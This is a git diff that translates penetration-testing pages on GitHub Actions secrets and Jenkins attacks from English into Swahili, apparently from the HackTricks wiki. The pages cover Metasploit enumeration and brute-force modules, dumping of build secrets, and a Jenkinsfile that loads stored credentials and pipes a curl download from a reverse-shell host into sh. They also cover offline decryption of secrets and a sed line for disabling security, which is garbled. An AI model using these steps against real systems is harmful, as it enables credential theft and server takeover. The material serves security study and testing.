+Vitendo vya Git vinaruhusu kuendesha **utendaji wa msimbo wakati tukio linapotokea**. Kwa kawaida, msimbo unaotekelezwa ni **kama vile unavyohusiana na msimbo wa hifadhi** (labda kujenga kontena la docker au kuangalia kwamba PR haina siri).
### Configuration
-In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+Katika _https://github.com/organizations/\/settings/actions_ inawezekana kuangalia **mipangilio ya vitendo vya github** kwa shirika.
-It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+Inawezekana kukataa matumizi ya vitendo vya github kabisa, **kuruhusu vitendo vyote vya github**, au kuruhusu vitendo fulani tu.
-It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
+Pia inawezekana kuunda **nani anahitaji idhini ili kuendesha Kitendo cha Github** na **ruhusa za GITHUB_TOKEN** za Kitendo cha Github wakati kinapotekelezwa.
### Git Secrets
-Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
-
-These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+Vitendo vya Github kwa kawaida vinahitaji aina fulani za siri ili kuingiliana na github au programu za wahusika wengine. Ili **kuepuka kuweka wazi** katika hifadhi, github inaruhusu kuweka kama **Siri**.
+Siri hizi zinaweza kuundwa **kwa hifadhi au kwa shirika lote**. Kisha, ili **Kitendo kiweze kufikia siri** unahitaji kuziandika kama:
```yaml
steps:
- - name: Hello world action
- with: # Set the secret as an input
- super_secret:${{ secrets.SuperSecret }}
- env: # Or as an environment variable
- super_secret:${{ secrets.SuperSecret }}
+- name: Hello world action
+with: # Set the secret as an input
+super_secret:${{ secrets.SuperSecret }}
+env: # Or as an environment variable
+super_secret:${{ secrets.SuperSecret }}
```
-
-#### Example using Bash
-
+#### Mfano wa kutumia Bash
```yaml
steps:
- - shell: bash
- env: SUPER_SECRET:${{ secrets.SuperSecret }}
- run: |
- example-command "$SUPER_SECRET"
+- shell: bash
+env: SUPER_SECRET:${{ secrets.SuperSecret }}
+run: |
+example-command "$SUPER_SECRET"
```
-
> [!WARNING]
-> Secrets **can only be accessed from the Github Actions** that have them declared.
+> Siri **zinaweza kufikiwa tu kutoka kwa Github Actions** ambazo zina matangazo yao.
-> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+> Mara tu zinapowekwa kwenye repo au mashirika **watumiaji wa github hawawezi kuzifikia tena**, wataweza tu **kuzibadilisha**.
-Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+Hivyo, **njia pekee ya kuiba siri za github ni kuwa na uwezo wa kufikia mashine inayotekeleza Github Action** (katika hali hiyo utaweza kufikia tu siri zilizotangazwa kwa ajili ya Action).
### Git Environments
-Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
-
+Github inaruhusu kuunda **mazingira** ambapo unaweza kuhifadhi **siri**. Kisha, unaweza kutoa ufikiaji wa github action kwa siri ndani ya mazingira kwa kitu kama:
```yaml
jobs:
- deployment:
- runs-on: ubuntu-latest
- environment: env_name
+deployment:
+runs-on: ubuntu-latest
+environment: env_name
```
-
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
@@ -229,11 +223,11 @@ The **branch protections of a repository** can be found in _https://github.com/\
Different protections can be applied to a branch (like to master):
- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
- - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
+- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
+- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
+- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
+- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
+- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
- **Require signed commits**. The commits need to be signed.
@@ -253,7 +247,3 @@ Different protections can be applied to a branch (like to master):
- [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 4dfba3ff3..2fba38c54 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -4,7 +4,7 @@
## Basic Information
-Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+Jenkins ni chombo kinachotoa njia rahisi ya kuanzisha **continuous integration** au **continuous delivery** (CI/CD) mazingira kwa karibu **yoyote** mchanganyiko wa **lugha za programu** na hifadhi za msimbo wa chanzo kwa kutumia pipelines. Aidha, inafanya kazi mbalimbali za kawaida za maendeleo kiotomatiki. Ingawa Jenkins haiondoi **hitaji la kuunda scripts kwa hatua binafsi**, inatoa njia ya haraka na yenye nguvu zaidi ya kuunganisha mfululizo mzima wa zana za kujenga, kujaribu, na kutekeleza kuliko mtu anavyoweza kujenga kwa urahisi kwa mikono.
{{#ref}}
basic-jenkins-information.md
@@ -12,74 +12,68 @@ basic-jenkins-information.md
## Unauthenticated Enumeration
-In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
-
+Ili kutafuta kurasa za Jenkins zinazovutia bila uthibitisho kama (_/people_ au _/asynchPeople_, hii inataja watumiaji wa sasa) unaweza kutumia:
```
msf> use auxiliary/scanner/http/jenkins_enum
```
-
-Check if you can execute commands without needing authentication:
-
+Angalia ikiwa unaweza kutekeleza amri bila kuhitaji uthibitisho:
```
msf> use auxiliary/scanner/http/jenkins_command
```
+Bila akreditivu unaweza kuangalia ndani ya _**/asynchPeople/**_ au _**/securityRealm/user/admin/search/index?q=**_ kwa **majina ya watumiaji**.
-Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
-
-You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
+Unaweza kupata toleo la Jenkins kutoka kwenye njia _**/oops**_ au _**/error**_.
.png>)
-### Known Vulnerabilities
+### Uthibitisho wa Hatari
{{#ref}}
https://github.com/gquere/pwn_jenkins
{{#endref}}
-## Login
+## Ingia
-In the basic information you can check **all the ways to login inside Jenkins**:
+Katika taarifa za msingi unaweza kuangalia **njia zote za kuingia ndani ya Jenkins**:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-### Register
+### Jisajili
-You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+Utakuwa na uwezo wa kupata mifano ya Jenkins ambazo **zinakuruhusu kuunda akaunti na kuingia ndani yake. Rahisi kama hiyo.**
-### **SSO Login**
+### **SSO Ingia**
-Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+Pia ikiwa **SSO** **ufunctionality**/**plugins** zilikuwepo basi unapaswa kujaribu **kuingia** kwenye programu ukitumia akaunti ya majaribio (yaani, akaunti ya majaribio ya **Github/Bitbucket**). Njia kutoka [**hapa**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
### Bruteforce
-**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
-
+**Jenkins** haina **sera ya nywila** na **kuzuia brute-force ya majina ya watumiaji**. Ni muhimu **kujaribu brute-force** watumiaji kwani **nywila dhaifu** au **majina ya watumiaji kama nywila** yanaweza kutumika, hata **majina ya watumiaji yaliyogeuzwa kuwa nywila**.
```
msf> use auxiliary/scanner/http/jenkins_login
```
-
### Password spraying
-Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+Tumia [hii script ya python](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) au [hii script ya powershell](https://github.com/chryzsh/JenkinsPasswordSpray).
### IP Whitelisting Bypass
-Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+Mashirika mengi yanachanganya **mifumo ya usimamizi wa chanzo wa SaaS** kama GitHub au GitLab na **ufumbuzi wa CI wa ndani, uliojitegemea** kama Jenkins au TeamCity. Mpangilio huu unaruhusu mifumo ya CI **kupokea matukio ya webhook kutoka kwa wauzaji wa chanzo wa SaaS**, hasa kwa ajili ya kuanzisha kazi za pipeline.
-To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+Ili kufanikisha hili, mashirika **yanapitia** **mipangilio ya IP** ya **mifumo ya SCM**, ikiruhusu kufikia **mfumo wa CI wa ndani** kupitia **webhooks**. Hata hivyo, ni muhimu kutambua kwamba **mtu yeyote** anaweza kuunda **akaunti** kwenye GitHub au GitLab na kuikamilisha ili **kuanzisha webhook**, ambayo inaweza kutuma maombi kwa **mfumo wa CI wa ndani**.
-Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+Angalia: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## Internal Jenkins Abuses
-In these scenarios we are going to suppose you have a valid account to access Jenkins.
+Katika hali hizi tutadhani una akaunti halali ya kufikia Jenkins.
> [!WARNING]
-> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+> Kulingana na **mekanismu ya Uidhinishaji** iliyowekwa katika Jenkins na ruhusa ya mtumiaji aliyeathirika, **unaweza kuwa na uwezo au usiwe na uwezo wa kutekeleza mashambulizi yafuatayo.**
-For more information check the basic information:
+Kwa maelezo zaidi angalia taarifa za msingi:
{{#ref}}
basic-jenkins-information.md
@@ -87,165 +81,155 @@ basic-jenkins-information.md
### Listing users
-If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+Ikiwa umefikia Jenkins unaweza orodhesha watumiaji wengine waliojiandikisha katika [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
### Dumping builds to find cleartext secrets
-Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
-
+Tumia [hii script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) kutupa matokeo ya console ya ujenzi na mabadiliko ya mazingira ya ujenzi ili kutumaini kupata siri za wazi.
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v
```
+### **Kuhusisha Akiba za SSH**
-### **Stealing SSH Credentials**
-
-If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+Ikiwa mtumiaji aliyeathirika ana **mamlaka ya kutosha kuunda/kubadilisha nodi mpya ya Jenkins** na akiba za SSH tayari zimehifadhiwa ili kufikia nodi nyingine, anaweza **kuhusisha akiba hizo** kwa kuunda/kubadilisha nodi na **kuweka mwenyeji ambaye atarekodi akiba hizo** bila kuthibitisha funguo za mwenyeji:
.png>)
-You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+Kwa kawaida, utaweza kupata akiba za ssh za Jenkins katika **mtoa huduma wa kimataifa** (`/credentials/`), hivyo unaweza pia kuzitupa kama unavyotupa siri nyingine yoyote. Taarifa zaidi katika [**Sehemu ya Kutupa Siri**](./#dumping-secrets).
-### **RCE in Jenkins**
+### **RCE katika Jenkins**
-Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+Kupata **shell katika seva ya Jenkins** inampa mshambuliaji fursa ya kuhusisha **siri** zote na **mabadiliko ya mazingira** na **kufanya kazi na mashine nyingine** zilizoko katika mtandao huo au hata **kusanya akiba za wingu**.
-By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+Kwa kawaida, Jenkins itakuwa **ikifanya kazi kama SYSTEM**. Hivyo, kuathiriwa kwake kutampa mshambuliaji **mamlaka ya SYSTEM**.
-### **RCE Creating/Modifying a project**
+### **RCE Kuunda/Kubadilisha mradi**
-Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+Kuunda/Kubadilisha mradi ni njia ya kupata RCE juu ya seva ya Jenkins:
{{#ref}}
jenkins-rce-creating-modifying-project.md
{{#endref}}
-### **RCE Execute Groovy script**
+### **RCE Kutekeleza script ya Groovy**
-You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+Unaweza pia kupata RCE kwa kutekeleza script ya Groovy, ambayo inaweza kuwa ya siri zaidi kuliko kuunda mradi mpya:
{{#ref}}
jenkins-rce-with-groovy-script.md
{{#endref}}
-### RCE Creating/Modifying Pipeline
+### RCE Kuunda/Kubadilisha Pipeline
-You can also get **RCE by creating/modifying a pipeline**:
+Unaweza pia kupata **RCE kwa kuunda/kubadilisha pipeline**:
{{#ref}}
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Pipeline Exploitation
+## Ukatili wa Pipeline
-To exploit pipelines you still need to have access to Jenkins.
+Ili kutumia pipelines bado unahitaji kuwa na ufikiaji wa Jenkins.
-### Build Pipelines
+### Kujenga Pipelines
-**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+**Pipelines** zinaweza pia kutumika kama **mekanismu ya kujenga katika miradi**, katika kesi hiyo inaweza kuwekewa **faili ndani ya hazina** ambayo itakuwa na sintaksia ya pipeline. Kwa kawaida `/Jenkinsfile` inatumika:
.png>)
-It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+Pia inawezekana **kuhifadhi faili za usanidi wa pipeline mahali pengine** (katika hazina nyingine kwa mfano) kwa lengo la **kutenganisha** ufikiaji wa hazina na ufikiaji wa pipeline.
-If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
-It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+Ikiwa mshambuliaji ana **ufikiaji wa kuandika juu ya faili hiyo** atakuwa na uwezo wa **kuyabadilisha** na **kuzindua** pipeline bila hata kuwa na ufikiaji wa Jenkins.\
+Inawezekana kwamba mshambuliaji atahitaji **kuzidi baadhi ya ulinzi wa tawi** (kulingana na jukwaa na mamlaka za mtumiaji wanaweza kuzidiwa au la).
-The most common triggers to execute a custom pipeline are:
+Vichocheo vya kawaida vya kutekeleza pipeline ya kawaida ni:
-- **Pull request** to the main branch (or potentially to other branches)
-- **Push to the main branch** (or potentially to other branches)
-- **Update the main branch** and wait until it's executed somehow
+- **Ombi la kuvuta** kwenye tawi kuu (au labda kwenye matawi mengine)
+- **Kusukuma kwenye tawi kuu** (au labda kwenye matawi mengine)
+- **Kusasisha tawi kuu** na kusubiri hadi itekelezwe kwa namna fulani
> [!NOTE]
-> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+> Ikiwa wewe ni **mtumiaji wa nje** huwezi kutarajia kuunda **PR kwenye tawi kuu** la hazina ya **mtumiaji/taasisi nyingine** na **kuzindua pipeline**... lakini ikiwa ime **pangwa vibaya** unaweza kabisa **kuathiri kampuni kwa kutumia hili**.
-### Pipeline RCE
+### RCE ya Pipeline
-In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+Katika sehemu ya awali ya RCE tayari ilionyeshwa mbinu ya [**kupata RCE kwa kubadilisha pipeline**](./#rce-creating-modifying-pipeline).
-### Checking Env variables
-
-It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+### Kuangalia Mabadiliko ya Mazingira
+Inawezekana kutangaza **mabadiliko ya mazingira ya maandiko wazi** kwa pipeline nzima au kwa hatua maalum. Mabadiliko haya ya mazingira **hayapaswi kuwa na taarifa nyeti**, lakini mshambuliaji anaweza kila wakati **kuangalia usanidi wote wa pipeline**/Jenkinsfiles:
```bash
pipeline {
- agent {label 'built-in'}
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
```
-
### Dumping secrets
-For information about how are secrets usually treated by Jenkins check out the basic information:
+Kwa maelezo kuhusu jinsi siri zinavyoshughulikiwa na Jenkins angalia taarifa za msingi:
{{#ref}}
basic-jenkins-information.md
{{#endref}}
-Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
-
-There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+Akreditivu zinaweza **kuwekwa kwa watoa huduma wa kimataifa** (`/credentials/`) au kwa **miradi maalum** (`/job//configure`). Hivyo, ili kuhamasisha zote unahitaji **kuathiri angalau miradi yote** ambayo ina siri na kutekeleza pipelines za kawaida/za sumu.
+Kuna tatizo lingine, ili kupata **siri ndani ya env** ya pipeline unahitaji **kujua jina na aina ya siri**. Kwa mfano, unajaribu **kuchaji** **`usernamePassword`** **siri** kama **`string`** **siri** utapata **kosa** hili:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
-
-Here you have the way to load some common secret types:
-
+Hapa kuna njia ya kupakia aina kadhaa za siri za kawaida:
```bash
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
- sh '''
- env #Search for USERNAME and PASS
- '''
+sh '''
+env #Search for USERNAME and PASS
+'''
}
withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
- sh '''
- env #Search for SECRET
- '''
+sh '''
+env #Search for SECRET
+'''
}
withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
- sh '''
- env # Search for USERPASS
- '''
+sh '''
+env # Search for USERPASS
+'''
}
# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- env
- '''
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+env
+'''
}
```
-
-At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+Katika mwisho wa ukurasa huu unaweza **kupata aina zote za akreditivu**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
-> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+> Njia bora ya **kutoa siri zote kwa wakati mmoja** ni kwa **kuathiri** mashine ya **Jenkins** (kufanya kazi na shell ya nyuma katika **node iliyo ndani** kwa mfano) na kisha **kuvuja** **funguo za mkuu** na **siri zilizofichwa** na kuzifungua bila mtandao.\
+> Zaidi kuhusu jinsi ya kufanya hivi katika [sehemu ya Nodes & Agents](./#nodes-and-agents) na katika [sehemu ya Post Exploitation](./#post-exploitation).
### Triggers
-From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
-
-Cron example:
+Kutoka [nyaraka](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Mwelekeo wa `triggers` unafafanua **njia za kiotomatiki ambazo Pipeline inapaswa kuanzishwa tena**. Kwa Pipelines ambazo zimeunganishwa na chanzo kama GitHub au BitBucket, `triggers` huenda zisihitajike kwani uunganisho wa msingi wa webhooks tayari utakuwepo. Triggers zinazopatikana kwa sasa ni `cron`, `pollSCM` na `upstream`.
+Mfano wa Cron:
```bash
triggers { cron('H */4 * * 1-5') }
```
-
Check **other examples in the docs**.
### Nodes & Agents
@@ -265,48 +249,44 @@ You can enumerate the **configured nodes** in `/computer/`, you will usually fin
It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
-
```bash
pipeline {
- agent {label 'built-in'}
+agent {label 'built-in'}
```
+### Mfano kamili
-### Complete example
-
-Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
-
+Pipeline katika wakala maalum, na kichocheo cha cron, na pipeline na hatua za mazingira, ikipakia mabadiliko 2 katika hatua na kutuma shell ya kinyume:
```bash
pipeline {
- agent {label 'built-in'}
- triggers { cron('H */4 * * 1-5') }
- environment {
- GENERIC_ENV_VAR = "Test pipeline ENV variables."
- }
+agent {label 'built-in'}
+triggers { cron('H */4 * * 1-5') }
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
- stages {
- stage("Build") {
- environment {
- STAGE_ENV_VAR = "Test stage ENV variables."
- }
- steps {
- withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
- string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
- '''
- }
- }
- }
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+'''
+}
+}
+}
- post {
- always {
- cleanWs()
- }
- }
+post {
+always {
+cleanWs()
+}
+}
}
```
-
-## Arbitrary File Read to RCE
+## Kusoma Faili Bila Mpangilio hadi RCE
{{#ref}}
jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -326,19 +306,17 @@ jenkins-rce-creating-modifying-project.md
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Post Exploitation
+## Baada ya Kutekeleza
### Metasploit
-
```
msf> post/multi/gather/jenkins_gather
```
-
### Jenkins Secrets
-You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
+Unaweza kuorodhesha siri kwa kufikia `/credentials/` ikiwa una ruhusa za kutosha. Kumbuka kwamba hii itataja tu siri zilizo ndani ya faili `credentials.xml`, lakini **faili za usanidi wa ujenzi** zinaweza pia kuwa na **siri zaidi**.
-If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+Ikiwa unaweza **kuona usanidi wa kila mradi**, unaweza pia kuona huko **majina ya siri (credentials)** yanayotumika kufikia hifadhi na **siri nyingine za mradi**.
.png>)
@@ -350,19 +328,18 @@ jenkins-dumping-secrets-from-groovy.md
#### From disk
-These files are needed to **decrypt Jenkins secrets**:
+Faili hizi zinahitajika ili **kufichua siri za Jenkins**:
- secrets/master.key
- secrets/hudson.util.Secret
-Such **secrets can usually be found in**:
+Siri hizo **kwa kawaida zinaweza kupatikana katika**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
-Here's a regex to find them:
-
+Hapa kuna regex ya kuzipata:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}
```
-
#### Decrypt Jenkins secrets offline
-If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
-
+Ikiwa umepata **neno la siri zinazohitajika kufungua siri hizo**, tumia [**hii script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **kufungua siri hizo**.
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
-
-#### Decrypt Jenkins secrets from Groovy
-
+#### Tafsiri siri za Jenkins kutoka Groovy
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
+### Unda mtumiaji mpya wa admin
-### Create new admin user
+1. Fikia faili la Jenkins config.xml katika `/var/lib/jenkins/config.xml` au `C:\Program Files (x86)\Jenkis\`
+2. Tafuta neno `true` na badilisha neno **`true`** kuwa **`false`**.
+1. `sed -i -e 's/truefalsetrue` na **restart Jenkins tena**.
-1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
-2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**.
- 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**.
-
-## References
+## Marejeleo
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 6e62a8536..f4b98938f 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -6,48 +6,48 @@
### Username + Password
-The most common way to login in Jenkins if with a username or a password
+Njia ya kawaida zaidi ya kuingia kwenye Jenkins ni kwa kutumia jina la mtumiaji au nenosiri.
### Cookie
